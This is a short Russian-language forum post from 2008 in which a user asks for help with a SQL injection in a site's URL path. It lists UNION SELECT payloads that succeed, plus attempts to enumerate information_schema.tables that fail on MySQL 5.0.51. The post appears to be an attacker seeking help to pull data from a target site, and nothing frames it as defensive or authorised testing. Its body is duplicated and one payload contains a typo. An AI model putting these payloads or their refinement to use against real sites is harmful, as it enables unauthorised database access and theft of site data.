ty13r
10.08.2008, 23:17
Имеется инъекция типа
http://site/cat/'SQL
где видимо применен mod_rewrite
запрос типа http://site/cat/' union select 1,2,3,4 прекрасно выполняется, даже есть поля выводимые на экране, но если попробовать выбрать данные из другой таблицы, например http://site/cat/' union select 1,2,3,4 from information_schema.tables, то возникает ошибка
Причем ошибка появляется и в тестовом случае http://site/cat/' union select 1,2,3,4 from (selest 1) as test хотя версия Mysql - 5.0.51
В чем проблемы?
http://site/cat/'SQL
где видимо применен mod_rewrite
запрос типа http://site/cat/' union select 1,2,3,4 прекрасно выполняется, даже есть поля выводимые на экране, но если попробовать выбрать данные из другой таблицы, например http://site/cat/' union select 1,2,3,4 from information_schema.tables, то возникает ошибка
Причем ошибка появляется и в тестовом случае http://site/cat/' union select 1,2,3,4 from (selest 1) as test хотя версия Mysql - 5.0.51
В чем проблемы?